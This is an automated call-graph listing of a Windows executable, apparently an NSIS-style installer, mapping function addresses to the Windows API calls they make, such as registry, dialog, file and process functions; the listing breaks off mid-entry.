4058->4059 4060 402c37 18 API calls 4058->4060 4063 40218b 4059->4063 4060->4059 4061 401423 25 API calls 4062 40224a 4061->4062 4063->4061 4063->4062 4064 40247e 4065 402c77 18 API calls 4064->4065 4066 402488 4065->4066 4067 402c37 18 API calls 4066->4067 4068 402491 4067->4068 4069 40249c RegQueryValueExW 4068->4069 4074 402885 4068->4074 4070 4024c2 RegCloseKey 4069->4070 4071 4024bc 4069->4071 4070->4074 4071->4070 4075 406193 wsprintfW 4071->4075 4075->4070 4391 40437e 4392 404396 4391->4392 4394 4044b0 4391->4394 4399 4041e1 19 API calls 4392->4399 4393 40451a 4395 4045e4 4393->4395 4396 404524 GetDlgItem 4393->4396 4394->4393 4394->4395 4401 4044eb GetDlgItem SendMessageW 4394->4401 4400 404248 8 API calls 4395->4400 4397 4045a5 4396->4397 4398 40453e 4396->4398 4397->4395 4405 4045b7 4397->4405 4398->4397 4404 404564 SendMessageW LoadCursorW SetCursor 4398->4404 4402 4043fd 4399->4402 4415 4045df 4400->4415 4424 404203 KiUserCallbackDispatcher 4401->4424 4403 4041e1 19 API calls 4402->4403 4407 40440a CheckDlgButton 4403->4407 4425 40462d 4404->4425 4409 4045cd 4405->4409 4410 4045bd SendMessageW 4405->4410 4422 404203 KiUserCallbackDispatcher 4407->4422 4414 4045d3 SendMessageW 4409->4414 4409->4415 4410->4409 4411 404515 4416 404609 SendMessageW 4411->4416 4414->4415 4416->4393 4417 404428 GetDlgItem 4423 404216 SendMessageW 4417->4423 4419 40443e SendMessageW 4420 404464 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4419->4420 4421 40445b GetSysColor 4419->4421 4420->4415 4421->4420 4422->4417 4423->4419 4424->4411 4428 405874 ShellExecuteExW 4425->4428 4427 404593 LoadCursorW SetCursor 4427->4397 4428->4427 4429 4019ff 4430 402c37 18 API calls 4429->4430 4431 401a06 4430->4431 4432 402c37 18 API calls 4431->4432 4433 401a0f 4432->4433 4434 401a16 lstrcmpiW 4433->4434 4435 401a28 lstrcmpW 4433->4435 4436 401a1c 4434->4436 4435->4436 3191 401f00 3206 402c37 3191->3206 3198 402885 3201 401f2b 3202 401f30 3201->3202 3203 401f3b 3201->3203 3231 406193 wsprintfW 3202->3231 3205 401f39 CloseHandle 3203->3205 3205->3198 3207 402c43 3206->3207 3232 40626e 3207->3232 3210 401f06 3212 4052b0 3210->3212 3213 4052cb 3212->3213 3214 401f10 3212->3214 3215 4052e7 lstrlenW 3213->3215 3216 40626e 18 API calls 3213->3216 3223 405831 CreateProcessW 3214->3223 3217 405310 3215->3217 3218 4052f5 lstrlenW 3215->3218 3216->3215 3220 405323 3217->3220 3221 405316 SetWindowTextW 3217->3221 3218->3214 3219 405307 lstrcatW 3218->3219 3219->3217 3220->3214 3222 405329 SendMessageW SendMessageW SendMessageW 3220->3222 3221->3220 3222->3214 3224 401f16 3223->3224 3225 405864 CloseHandle 3223->3225 3224->3198 3224->3205 3226 4066d7 WaitForSingleObject 3224->3226 3225->3224 3227 4066f1 3226->3227 3228 406703 GetExitCodeProcess 3227->3228 3275 406662 3227->3275 3228->3201 3231->3205 3236 40627b 3232->3236 3233 4064c6 3234 402c64 3233->3234 3266 40624c lstrcpynW 3233->3266 3234->3210 3250 4064e0 3234->3250 3236->3233 3237 406494 lstrlenW 3236->3237 3238 40626e 10 API calls 3236->3238 3242 4063a9 GetSystemDirectoryW 3236->3242 3243 4063bc GetWindowsDirectoryW 3236->3243 3244 4064e0 5 API calls 3236->3244 3245 406437 lstrcatW 3236->3245 3246 40626e 10 API calls 3236->3246 3247 4063f0 SHGetSpecialFolderLocation 3236->3247 3248 4063dd SHGetFolderPathW 3236->3248 3259 40611a 3236->3259 3264 406193 wsprintfW 3236->3264 3265 40624c lstrcpynW 3236->3265 3237->3236 3238->3237 3242->3236 3243->3236 3244->3236 3245->3236 3246->3236 3247->3236 3249 406408 SHGetPathFromIDListW CoTaskMemFree 3247->3249 3248->3236 3248->3247 3249->3236 3257 4064ed 3250->3257 3251 406563 3252 406568 CharPrevW 3251->3252 3254 406589 3251->3254 3252->3251 3253 406556 CharNextW 3253->3251 3253->3257 3254->3210 3256 406542 CharNextW 3256->3257 3257->3251 3257->3253 3257->3256 3258 406551 CharNextW 3257->3258 3271 405b4a 3257->3271 3258->3253 3267 4060b9 3259->3267 3262 40617e 3262->3236 3263 40614e RegQueryValueExW RegCloseKey 3263->3262 3264->3236 3265->3236 3266->3234 3268 4060c8 3267->3268 3269 4060d1 RegOpenKeyExW 3268->3269 3270 4060cc 3268->3270 3269->3270 3270->3262 3270->3263 3272 405b50 3271->3272 3273 405b66 3272->3273 3274 405b57 CharNextW 3272->3274 3273->3257 3274->3272 3276 40667f PeekMessageW 3275->3276 3277 406675 DispatchMessageW 3276->3277 3278 40668f WaitForSingleObject 3276->3278 3277->3276 3278->3227 4437 401000 4438 401037 BeginPaint GetClientRect 4437->4438 4439 40100c DefWindowProcW 4437->4439 4441 4010f3 4438->4441 4442 401179 4439->4442 4443 401073 CreateBrushIndirect FillRect DeleteObject 4441->4443 4444 4010fc 4441->4444 4443->4441 4445 401102 CreateFontIndirectW 4444->4445 4446 401167 EndPaint 4444->4446 4445->4446 4447 401112 6 API calls 4445->4447 4446->4442 4447->4446 4448 401503 4449 40150b 4448->4449 4451 40151e 4448->4451 4450 402c15 18 API calls 4449->4450 4450->4451 3478 402306 3479 40230e 3478->3479 3482 402314 3478->3482 3480 402c37 18 API calls 3479->3480 3480->3482 3481 402322 3484 402330 3481->3484 3485 402c37 18 API calls 3481->3485 3482->3481 3483 402c37 18 API calls 3482->3483 3483->3481 3486 402c37 18 API calls 3484->3486 3485->3484 3487 402339 WritePrivateProfileStringW 3486->3487 4452 404a06 4453 404a32 4452->4453 4454 404a16 4452->4454 4456 404a65 4453->4456 4457 404a38 SHGetPathFromIDListW 4453->4457 4463 405892 GetDlgItemTextW 4454->4463 4459 404a4f SendMessageW 4457->4459 4460 404a48 4457->4460 4458 404a23 SendMessageW 4458->4453 4459->4456 4461 40140b 2 API calls 4460->4461 4461->4459 4463->4458 4464 401f86 4465 402c37 18 API calls 4464->4465 4466 401f8d 4465->4466 4467 406626 5 API calls 4466->4467 4468 401f9c 4467->4468 4469 401fb8 GlobalAlloc 4468->4469 4470 402020 4468->4470 4469->4470 4471 401fcc 4469->4471 4472 406626 5 API calls 4471->4472 4473 401fd3 4472->4473 4474 406626 5 API calls 4473->4474 4475 401fdd 4474->4475 4475->4470 4479 406193 wsprintfW 4475->4479 4477 402012 4480 406193 wsprintfW 4477->4480 4479->4477 4480->4470 3495 403d08 3496 403d20 3495->3496 3497 403e5b 3495->3497 3496->3497 3499 403d2c 3496->3499 3498 403e6c GetDlgItem GetDlgItem 3497->3498 3503 403eac 3497->3503 3502 4041e1 19 API calls 3498->3502 3500 403d37 SetWindowPos 3499->3500 3501 403d4a 3499->3501 3500->3501 3505 403d67 3501->3505 3506 403d4f ShowWindow 3501->3506 3507 403e96 SetClassLongW 3502->3507 3504 403f06 3503->3504 3512 401389 2 API calls 3503->3512 3513 403e56 3504->3513 3566 40422d 3504->3566 3509 403d89 3505->3509 3510 403d6f DestroyWindow 3505->3510 3506->3505 3511 40140b 2 API calls 3507->3511 3515 403d8e SetWindowLongW 3509->3515 3516 403d9f 3509->3516 3514 40416a 3510->3514 3511->3503 3517 403ede 3512->3517 3514->3513 3523 40419b ShowWindow 3514->3523 3515->3513 3520 403e48 3516->3520 3521 403dab GetDlgItem 3516->3521 3517->3504 3522 403ee2 SendMessageW 3517->3522 3518 40140b 2 API calls 3535 403f18 3518->3535 3519 40416c DestroyWindow EndDialog 3519->3514 3588 404248 3520->3588 3524 403ddb 3521->3524 3525 403dbe SendMessageW IsWindowEnabled 3521->3525 3522->3513 3523->3513 3528 403de8 3524->3528 3529 403dfb 3524->3529 3530 403e2f SendMessageW 3524->3530 3539 403de0 3524->3539 3525->3513 3525->3524 3527 40626e 18 API calls 3527->3535 3528->3530 3528->3539 3532 403e03 3529->3532 3533 403e18 3529->3533 3530->3520 3582 40140b 3532->3582 3537 40140b 2 API calls 3533->3537 3534 403e16 3534->3520 3535->3513 3535->3518 3535->3519 3535->3527 3538 4041e1 19 API calls 3535->3538 3557 4040ac DestroyWindow 3535->3557 3569 4041e1 3535->3569 3540 403e1f 3537->3540 3538->3535 3585 4041ba 3539->3585 3540->3520 3540->3539 3542 403f93 GetDlgItem 3543 403fb0 ShowWindow KiUserCallbackDispatcher 3542->3543 3544 403fa8 3542->3544 3572 404203 KiUserCallbackDispatcher 3543->3572 3544->3543 3546 403fda EnableWindow 3551 403fee 3546->3551 3547 403ff3 GetSystemMenu EnableMenuItem SendMessageW 3548 404023 SendMessageW 3547->3548 3547->3551 3548->3551 3551->3547 3573 404216 SendMessageW 3551->3573 3574 403ce9 3551->3574 3577 40624c lstrcpynW 3551->3577 3553 404052 lstrlenW 3554 40626e 18 API calls 3553->3554 3555 404068 SetWindowTextW 3554->3555 3578 401389 3555->3578 3557->3514 3558 4040c6 CreateDialogParamW 3557->3558 3558->3514 3559 4040f9 3558->3559 3560 4041e1 19 API calls 3559->3560 3561 404104 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3560->3561 3562 401389 2 API calls 3561->3562 3563 40414a 3562->3563 3563->3513 3564 404152 ShowWindow 3563->3564 3565 40422d SendMessageW 3564->3565 3565->3514 3567 404245 3566->3567 3568 404236 SendMessageW 3566->3568 3567->3535 3568->3567 3570 40626e 18 API calls 3569->3570 3571 4041ec SetDlgItemTextW 3570->3571 3571->3542 3572->3546 3573->3551 3575 40626e 18 API calls 3574->3575 3576 403cf7 SetWindowTextW 3575->3576 3576->3551 3577->3553 3580 401390 3578->3580 3579 4013fe 3579->3535 3580->3579 3581 4013cb MulDiv SendMessageW 3580->3581 3581->3580 3583 401389 2 API calls 3582->3583 3584 401420 3583->3584 3584->3539 3586 4041c1 3585->3586 3587 4041c7 SendMessageW 3585->3587 3586->3587 3587->3534 3589 404260 GetWindowLongW 3588->3589 3599 4042e9 3588->3599 3590 404271 3589->3590 3589->3599 3591 404280 GetSysColor 3590->3591 3592 404283 3590->3592 3591->3592 3593 404293 SetBkMode 3592->3593 3594 404289 SetTextColor 3592->3594 3595 4042b1 3593->3595 3596 4042ab GetSysColor 3593->3596 3594->3593 3597 4042c2 3595->3597 3598 4042b8 SetBkColor 3595->3598 3596->3595 3597->3599 3600 4042d5 DeleteObject 3597->3600 3601 4042dc CreateBrushIndirect 3597->3601 3598->3597 3599->3513 3600->3601 3601->3599 3602 402388 3603 402390 3602->3603 3604 4023bb 3602->3604 3618 402c77 3603->3618 3606 402c37 18 API calls 3604->3606 3608 4023c2 3606->3608 3614 402cf5 3608->3614 3609 4023a1 3611 402c37 18 API calls 3609->3611 3613 4023a8 RegDeleteValueW RegCloseKey 3611->3613 3612 4023cf 3613->3612 3615 402d0b 3614->3615 3617 402d21 3615->3617 3623 402d2a 3615->3623 3617->3612 3619 402c37 18 API calls 3618->3619 3620 402c8e 3619->3620 3621 4060b9 RegOpenKeyExW 3620->3621 3622 402397 3621->3622 3622->3609 3622->3612 3624 4060b9 RegOpenKeyExW 3623->3624 3625 402d58 3624->3625 3626 402dd0 3625->3626 3627 402d5c 3625->3627 3626->3617 3628 402d7e RegEnumKeyW 3627->3628 3629 402d95 RegCloseKey 3627->3629 3630 402db6 RegCloseKey 3627->3630 3632 402d2a 6 API calls 3627->3632 3628->3627 3628->3629 3631 406626 5 API calls 3629->3631 3630->3626 3633 402da5 3631->3633 3632->3627 3634 402dc4 RegDeleteKeyW 3633->3634 3635 402da9 3633->3635 3634->3626 3635->3626 4488 40190c 4489 401943 4488->4489 4490 402c37 18 API calls 4489->4490 4491 401948 4490->4491 4492 40595a 68 API calls 4491->4492 4493 401951 4492->4493 4501 401d0e 4502 402c15 18 API calls 4501->4502 4503 401d15 4502->4503 4504 402c15 18 API calls 4503->4504 4505 401d21 GetDlgItem 4504->4505 4506 40258c 4505->4506 4507 40190f 4508 402c37 18 API calls 4507->4508 4509 401916 4508->4509 4510 4058ae MessageBoxIndirectW 4509->4510 4511 40191f 4510->4511 4512 401491 4513 4052b0 25 API calls 4512->4513 4514 401498 4513->4514 4515 402592 4516 4025c1 4515->4516 4517 4025a6 4515->4517 4519 4025f5 4516->4519 4520 4025c6 4516->4520 4518 402c15 18 API calls 4517->4518 4525 4025ad 4518->4525 4521 402c37 18 API calls 4519->4521 4522 402c37 18 API calls 4520->4522 4523 4025fc lstrlenW 4521->4523 4524 4025cd WideCharToMultiByte lstrlenA 4522->4524 4523->4525 4524->4525 4526 402629 4525->4526 4527 40263f 4525->4527 4529 405e1f 5 API calls 4525->4529 4526->4527 4528 405df0 WriteFile 4526->4528 4528->4527 4529->4526 4537 403918 4538 403923 4537->4538 4539 403927 4538->4539 4540 40392a GlobalAlloc 4538->4540 4540->4539 3707 401c19 3708 402c15 18 API calls 3707->3708 3709 401c20 3708->3709 3710 402c15 18 API calls 3709->3710 3711 401c2d 3710->3711 3712 401c42 3711->3712 3713 402c37 18 API calls 3711->3713 3714 401c52 3712->3714 3715 402c37 18 API calls 3712->3715 3713->3712 3716 401ca9 3714->3716 3717 401c5d 3714->3717 3715->3714 3718 402c37 18 API calls 3716->3718 3719 402c15 18 API calls 3717->3719 3720 401cae 3718->3720 3721 401c62 3719->3721 3722 402c37 18 API calls 3720->3722 3723 402c15 18 API calls 3721->3723 3725 401cb7 FindWindowExW 3722->3725 3724 401c6e 3723->3724 3726 401c99 SendMessageW 3724->3726 3727 401c7b SendMessageTimeoutW 3724->3727 3728 401cd9 3725->3728 3726->3728 3727->3728 4541 402a9a SendMessageW 4542 402ab4 InvalidateRect 4541->4542 4543 402abf 4541->4543 4542->4543 4544 40281b 4545 402821 4544->4545 4546 402829 FindClose 4545->4546 4547 402abf 4545->4547 4546->4547 4548 40149e 4549 4022f1 4548->4549 4550 4014ac PostQuitMessage 4548->4550 4550->4549 4551 4029a2 4552 402c15 18 API calls 4551->4552 4553 4029a8 4552->4553 4554 4029e8 4553->4554 4555 4029cf 4553->4555 4557 402885 4553->4557 4558 402a02 4554->4558 4559 4029f2 4554->4559 4556 4029d4 4555->4556 4564 4029e5 4555->4564 4565 40624c lstrcpynW 4556->4565 4561 40626e 18 API calls 4558->4561 4560 402c15 18 API calls 4559->4560 4560->4564 4561->4564 4564->4557 4566 406193 wsprintfW 4564->4566 4565->4557 4566->4557 3474 4015a3 3475 402c37 18 API calls 3474->3475 3476 4015aa SetFileAttributesW 3475->3476 3477 4015bc 3476->3477 4574 405224 4575 405234 4574->4575 4576 405248 4574->4576 4577 40523a 4575->4577 4586 405291 4575->4586 4578 405250 IsWindowVisible 4576->4578 4582 405267 4576->4582 4580 40422d SendMessageW 4577->4580 4581 40525d 4578->4581 4578->4586 4579 405296 CallWindowProcW 4583 405244 4579->4583 4580->4583 4587 404b7a SendMessageW 4581->4587 4582->4579 4592 404bfa 4582->4592 4586->4579 4588 404bd9 SendMessageW 4587->4588 4589 404b9d GetMessagePos ScreenToClient SendMessageW 4587->4589 4590 404bd1 4588->4590 4589->4590 4591 404bd6 4589->4591 4590->4582 4591->4588 4601 40624c lstrcpynW 4592->4601 4594 404c0d 4602 406193 wsprintfW 4594->4602 4596 404c17 4597 40140b 2 API calls 4596->4597 4598 404c20 4597->4598 4603 40624c lstrcpynW 4598->4603 4600 404c27 4600->4586 4601->4594 4602->4596 4603->4600 4604 4028a7 4605 402c37 18 API calls 4604->4605 4606 4028b5 4605->4606 4607 4028cb 4606->4607 4608 402c37 18 API calls 4606->4608 4609 405d19 2 API calls 4607->4609 4608->4607 4610 4028d1 4609->4610 4632 405d3e GetFileAttributesW CreateFileW 4610->4632 4612 4028de 4613 402981 4612->4613 4614 4028ea GlobalAlloc 4612->4614 4617 402989 DeleteFileW 4613->4617 4618 40299c 4613->4618 4615 402903 4614->4615 4616 402978 CloseHandle 4614->4616 4633 4032f5 SetFilePointer 4615->4633 4616->4613 4617->4618 4620 402909 4621 4032df ReadFile 4620->4621 4622 402912 GlobalAlloc 4621->4622 4623 402922 4622->4623 4624 402956 4622->4624 4626 4030fa 36 API calls 4623->4626 4625 405df0 WriteFile 4624->4625 4627 402962 GlobalFree 4625->4627 4631 40292f 4626->4631 4628 4030fa 36 API calls 4627->4628 4630 402975 4628->4630 4629 40294d GlobalFree 4629->4624 4630->4616 4631->4629 4632->4612 4633->4620 4634 404c2c GetDlgItem GetDlgItem 4635 404c7e 7 API calls 4634->4635 4644 404e97 4634->4644 4636 404d21 DeleteObject 4635->4636 4637 404d14 SendMessageW 4635->4637 4638 404d2a 4636->4638 4637->4636 4639 404d61 4638->4639 4643 40626e 18 API calls 4638->4643 4641 4041e1 19 API calls 4639->4641 4640 404f7b 4642 405027 4640->4642 4646 404e8a 4640->4646 4652 404fd4 SendMessageW 4640->4652 4645 404d75 4641->4645 4647 405031 SendMessageW 4642->4647 4648 405039 4642->4648 4649 404d43 SendMessageW SendMessageW 4643->4649 4644->4640 4650 404b7a 5 API calls 4644->4650 4668 404f08 4644->4668 4651 4041e1 19 API calls 4645->4651 4653 404248 8 API calls 4646->4653 4647->4648 4655 405052 4648->4655 4656 40504b ImageList_Destroy 4648->4656 4663 405062 4648->4663 4649->4638 4650->4668 4669 404d83 4651->4669 4652->4646 4658 404fe9 SendMessageW 4652->4658 4659 40521d 4653->4659 4654 404f6d SendMessageW 4654->4640 4660 40505b GlobalFree 4655->4660 4655->4663 4656->4655 4657 4051d1 4657->4646 4664 4051e3 ShowWindow GetDlgItem ShowWindow 4657->4664 4662 404ffc 4658->4662 4660->4663 4661 404e58 GetWindowLongW SetWindowLongW 4665 404e71 4661->4665 4673 40500d SendMessageW 4662->4673 4663->4657 4677 404bfa 4 API calls 4663->4677 4681 40509d 4663->4681 4664->4646 4666 404e77 ShowWindow 4665->4666 4667 404e8f 4665->4667 4685 404216 SendMessageW 4666->4685 4686 404216 SendMessageW 4667->4686 4668->4640 4668->4654 4669->4661 4672 404dd3 SendMessageW 4669->4672 4674 404e52 4669->4674 4675 404e20 SendMessageW 4669->4675 4676 404e0f SendMessageW 4669->4676 4672->4669 4673->4642 4674->4661 4674->4665 4675->4669 4676->4669 4677->4681 4678 4051a7 InvalidateRect 4678->4657 4679 4051bd 4678->4679 4682 404b35 21 API calls 4679->4682 4680 4050cb SendMessageW 4684 4050e1 4680->4684 4681->4680 4681->4684 4682->4657 4683 405155 SendMessageW SendMessageW 4683->4684 4684->4678 4684->4683 4685->4646 4686->4644 4687 40202c 4688 40203e 4687->4688 4698 4020f0 4687->4698 4689 402c37 18 API calls 4688->4689 4690 402045 4689->4690 4692 402c37 18 API calls 4690->4692 4691 401423 25 API calls 4696 40224a 4691->4696 4693 40204e 4692->4693 4694 402064 LoadLibraryExW 4693->4694 4695 402056 GetModuleHandleW 4693->4695 4697 402075 4694->4697 4694->4698 4695->4694 4695->4697 4707 406695 WideCharToMultiByte 4697->4707 4698->4691 4701 402086 4704 401423 25 API calls 4701->4704 4705 402096 4701->4705 4702 4020bf 4703 4052b0 25 API calls 4702->4703 4703->4705 4704->4705 4705->4696 4706 4020e2 FreeLibrary 4705->4706 4706->4696 4708 402080 4707->4708 4709 4066bf GetProcAddress 4707->4709 4708->4701 4708->4702 4709->4708 4710 40432f lstrlenW 4711 404350 WideCharToMultiByte 4710->4711 4712 40434e 4710->4712 4712->4711 4713 402a2f 4714 402c15 18 API calls 4713->4714 4715 402a35 4714->4715 4716 402a6c 4715->4716 4717 402885 4715->4717 4719 402a47 4715->4719 4716->4717 4718 40626e 18 API calls 4716->4718 4718->4717 4719->4717 4721 406193 wsprintfW 4719->4721 4721->4717 4722 401a30 4723 402c37 18 API calls 4722->4723 4724 401a39 ExpandEnvironmentStringsW 4723->4724 4725 401a4d 4724->4725 4727 401a60 4724->4727 4726 401a52 lstrcmpW 4725->4726 4725->4727 4726->4727 4733 401db3 GetDC 4734 402c15 18 API calls 4733->4734 4735 401dc5 GetDeviceCaps MulDiv ReleaseDC 4734->4735 4736 402c15 18 API calls 4735->4736 4737 401df6 4736->4737 4738 40626e 18 API calls 4737->4738 4739 401e33 CreateFontIndirectW 4738->4739 4740 40258c 4739->4740 4741 401735 4742 402c37 18 API calls 4741->4742 4743 40173c SearchPathW 4742->4743 4744 401757 4743->4744 4745 402835 4746 40283d 4745->4746 4747 402841 FindNextFileW 4746->4747 4750 402853 4746->4750 4748 40289a 4747->4748 4747->4750 4751 40624c lstrcpynW 4748->4751 4751->4750 4752 4014b8 4753 4014be 4752->4753 4754 401389 2 API calls 4753->4754 4755 4014c6 4754->4755 3753 40333d SetErrorMode GetVersion 3754 40337c 3753->3754 3755 403382 3753->3755 3756 406626 5 API calls 3754->3756 3757 4065b6 3 API calls 3755->3757 3756->3755 3758 403398 lstrlenA 3757->3758 3758->3755 3759 4033a8 3758->3759 3760 406626 5 API calls 3759->3760 3761 4033af 3760->3761 3762 406626 5 API calls 3761->3762 3763 4033b6 3762->3763 3764 406626 5 API calls 3763->3764 3765 4033c2 #17 OleInitialize SHGetFileInfoW 3764->3765 3844 40624c lstrcpynW 3765->3844 3768 40340e GetCommandLineW 3845 40624c lstrcpynW 3768->3845 3770 403420 GetModuleHandleW 3771 403438 3770->3771 3772 405b4a CharNextW 3771->3772 3773 403447 CharNextW 3772->3773 3774 403571 GetTempPathW 3773->3774 3784 403460 3773->3784 3846 40330c 3774->3846 3776 403589 3777 4035e3 DeleteFileW 3776->3777 3778 40358d GetWindowsDirectoryW lstrcatW 3776->3778 3856 402ec1 GetTickCount GetModuleFileNameW 3777->3856 3779 40330c 12 API calls 3778->3779 3782 4035a9 3779->3782 3780 405b4a CharNextW 3780->3784 3782->3777 3785 4035ad GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3782->3785 3783 4035f7 3791 405b4a CharNextW 3783->3791 3828 40369a 3783->3828 3839 4036aa 3783->3839 3784->3780 3787 40355c 3784->3787 3789 40355a 3784->3789 3788 40330c 12 API calls 3785->3788 3940 40624c lstrcpynW 3787->3940 3794 4035db 3788->3794 3789->3774 3795 403616 3791->3795 3794->3777 3794->3839 3802 403674 3795->3802 3803 4036da 3795->3803 3796 4037e4 3799 4037ec GetCurrentProcess OpenProcessToken 3796->3799 3800 403868 ExitProcess 3796->3800 3797 4036c4 3950 4058ae 3797->3950 3805 403804 LookupPrivilegeValueW AdjustTokenPrivileges 3799->3805 3806 403838 3799->3806 3807 405c25 18 API calls 3802->3807 3808 405819 5 API calls 3803->3808 3805->3806 3809 406626 5 API calls 3806->3809 3810 403680 3807->3810 3811 4036df lstrcatW 3808->3811 3812 40383f 3809->3812 3810->3839 3941 40624c lstrcpynW 3810->3941 3814 4036f0 lstrcatW 3811->3814 3815 4036fb lstrcatW lstrcmpiW 3811->3815 3813 403854 ExitWindowsEx 3812->3813 3816 403861 3812->3816 3813->3800 3813->3816 3814->3815 3818 403717 3815->3818 3815->3839 3819 40140b 2 API calls 3816->3819 3821 403723 3818->3821 3822 40371c 3818->3822 3819->3800 3820 40368f 3942 40624c lstrcpynW 3820->3942 3824 4057fc 2 API calls 3821->3824 3823 40577f 4 API calls 3822->3823 3826 403721 3823->3826 3827 403728 SetCurrentDirectoryW 3824->3827 3826->3827 3829 403743 3827->3829 3830 403738 3827->3830 3884 40395a 3828->3884 3955 40624c lstrcpynW 3829->3955 3954 40624c lstrcpynW 3830->3954 3833 40626e 18 API calls 3834 403782 DeleteFileW 3833->3834 3835 40378f CopyFileW 3834->3835 3841 403751 3834->3841 3835->3841 3836 4037d8 3837 406012 37 API calls 3836->3837 3837->3839 3838 406012 37 API calls 3838->3841 3943 403880 3839->3943 3840 40626e 18 API calls 3840->3841 3841->3833 3841->3836 3841->3838 3841->3840 3842 405831 2 API calls 3841->3842 3843 4037c3 CloseHandle 3841->3843 3842->3841 3843->3841 3844->3768 3845->3770 3847 4064e0 5 API calls 3846->3847 3849 403318 3847->3849 3848 403322 3848->3776 3849->3848 3850 405b1d 3 API calls 3849->3850 3851 40332a 3850->3851 3852 4057fc 2 API calls 3851->3852 3853 403330 3852->3853 3854 405d6d 2 API calls 3853->3854 3855 40333b 3854->3855 3855->3776 3956 405d3e GetFileAttributesW CreateFileW 3856->3956 3858 402f01 3877 402f11 3858->3877 3957 40624c lstrcpynW 3858->3957 3860 402f27 3861 405b69 2 API calls 3860->3861 3862 402f2d 3861->3862 3958 40624c lstrcpynW 3862->3958 3864 402f38 GetFileSize 3865 403034 3864->3865 3883 402f4f 3864->3883 3959 402e5d 3865->3959 3867 40303d 3869 40306d GlobalAlloc 3867->3869 3867->3877 3998 4032f5 SetFilePointer 3867->3998 3970 4032f5 SetFilePointer 3869->3970 3871 4030a0 3874 402e5d 6 API calls 3871->3874 3873 403088 3971 4030fa 3873->3971 3874->3877 3875 403056 3878 4032df ReadFile 3875->3878 3877->3783 3879 403061 3878->3879 3879->3869 3879->3877 3880 402e5d 6 API calls 3880->3883 3881 403094 3881->3877 3881->3881 3882 4030d1 SetFilePointer 3881->3882 3882->3877 3883->3865 3883->3871 3883->3877 3883->3880 3995 4032df 3883->3995 3885 406626 5 API calls 3884->3885 3886 40396e 3885->3886 3887 403974 3886->3887 3888 403986 3886->3888 4016 406193 wsprintfW 3887->4016 3889 40611a 3 API calls 3888->3889 3890 4039b6 3889->3890 3892 4039d5 lstrcatW 3890->3892 3894 40611a 3 API calls 3890->3894 3893 403984 3892->3893 4008 403c30 3893->4008 3894->3892 3897 405c25 18 API calls 3900 403a07 3897->3900 3898 403a9b 3899 405c25 18 API calls 3898->3899 3901 403aa1 3899->3901 3900->3898 3902 40611a 3 API calls 3900->3902 3904 403ab1 LoadImageW 3901->3904 3905 40626e 18 API calls 3901->3905 3903 403a39 3902->3903 3903->3898 3908 403a5a lstrlenW 3903->3908 3911 405b4a CharNextW 3903->3911 3906 403b57 3904->3906 3907 403ad8 RegisterClassW 3904->3907 3905->3904 3910 40140b 2 API calls 3906->3910 3909 403b0e SystemParametersInfoW CreateWindowExW 3907->3909 3939 403b61 3907->3939 3912 403a68 lstrcmpiW 3908->3912 3913 403a8e 3908->3913 3909->3906 3914 403b5d 3910->3914 3915 403a57 3911->3915 3912->3913 3916 403a78 GetFileAttributesW 3912->3916 3917 405b1d 3 API calls 3913->3917 3919 403c30 19 API calls 3914->3919 3914->3939 3915->3908 3918 403a84 3916->3918 3920 403a94 3917->3920 3918->3913 3921 405b69 2 API calls 3918->3921 3922 403b6e 3919->3922 4017 40624c lstrcpynW 3920->4017 3921->3913 3924 403b7a ShowWindow 3922->3924 3925 403bfd 3922->3925 3927 4065b6 3 API calls 3924->3927 3926 405383 5 API calls 3925->3926 3929 403c03 3926->3929 3928 403b92 3927->3928 3930 403ba0 GetClassInfoW 3928->3930 3933 4065b6 3 API calls 3928->3933 3931 403c07 3929->3931 3932 403c1f 3929->3932 3935 403bb4 GetClassInfoW RegisterClassW 3930->3935 3936 403bca DialogBoxParamW 3930->3936 3938 40140b 2 API calls 3931->3938 3931->3939 3934 40140b 2 API calls 3932->3934 3933->3930 3934->3939 3935->3936 3937 40140b 2 API calls 3936->3937 3937->3939 3938->3939 3939->3839 3940->3789 3941->3820 3942->3828 3944 403898 3943->3944 3945 40388a CloseHandle 3943->3945 4019 4038c5 3944->4019 3945->3944 3948 40595a 68 API calls 3949 4036b3 OleUninitialize 3948->3949 3949->3796 3949->3797 3951 4058c3 3950->3951 3952 4036d2 ExitProcess 3951->3952 3953 4058d7 MessageBoxIndirectW 3951->3953 3953->3952 3954->3829 3955->3841 3956->3858 3957->3860 3958->3864 3960 402e66 3959->3960 3961 402e7e 3959->3961 3962 402e76 3960->3962 3963 402e6f DestroyWindow 3960->3963 3964 402e86 3961->3964 3965 402e8e GetTickCount 3961->3965 3962->3867 3963->3962 3966 406662 2 API calls 3964->3966 3967 402e9c CreateDialogParamW ShowWindow 3965->3967 3968 402ebf 3965->3968 3969 402e8c 3966->3969 3967->3968 3968->3867 3969->3867 3970->3873 3972 403113 3971->3972 3973 40313e 3972->3973 4007 4032f5 SetFilePointer 3972->4007 3975 4032df ReadFile 3973->3975 3976 403149 3975->3976 3977 40315b GetTickCount 3976->3977 3978 40327f 3976->3978 3980 403277 3976->3980 3985 40316e 3977->3985 3979 403283 3978->3979 3984 40329b 3978->3984 3981 4032df ReadFile 3979->3981 3980->3881 3981->3980 3982 4032df ReadFile 3982->3984 3983 4032df ReadFile 3983->3985 3984->3980 3984->3982 3986 4032b6 3984->3986 3985->3980 3985->3983 3989 4031d4 GetTickCount 3985->3989 3999 4067a7 3985->3999 3986->3980 3986->3984 3987 405df0 WriteFile 3986->3987 3987->3986 3994 4031ed 3989->3994 3990 4031fd MulDiv wsprintfW 3992 4052b0 25 API calls 3990->3992 3991 403269 3991->3980 3992->3994 3993 405df0 WriteFile 3993->3994 3994->3980 3994->3985 3994->3990 3994->3991 3994->3993 3996 405dc1 ReadFile 3995->3996 3997 4032f2 3996->3997 3997->3883 3998->3875 4000 4067cc 3999->4000 4001 4067d4 3999->4001 4000->3985 4001->4000 4002 406864 GlobalAlloc 4001->4002 4003 40685b GlobalFree 4001->4003 4005 4068d2 GlobalFree 4001->4005 4006 4068db GlobalAlloc 4001->4006 4002->4000 4004 406878 4002->4004 4003->4002 4004->4001 4005->4006 4006->4000 4006->4001 4007->3973 4009 403c44 4008->4009 4018 406193 wsprintfW 4009->4018 4011 403cb5 4012 403ce9 19 API calls 4011->4012 4014 403cba 4012->4014 4013 4039e5 4013->3897 4014->4013 4015 40626e 18 API calls 4014->4015 4015->4014 4016->3893 4017->3898 4018->4011 4020 4038d3 4019->4020 4021 4038d8 FreeLibrary GlobalFree 4020->4021 4022 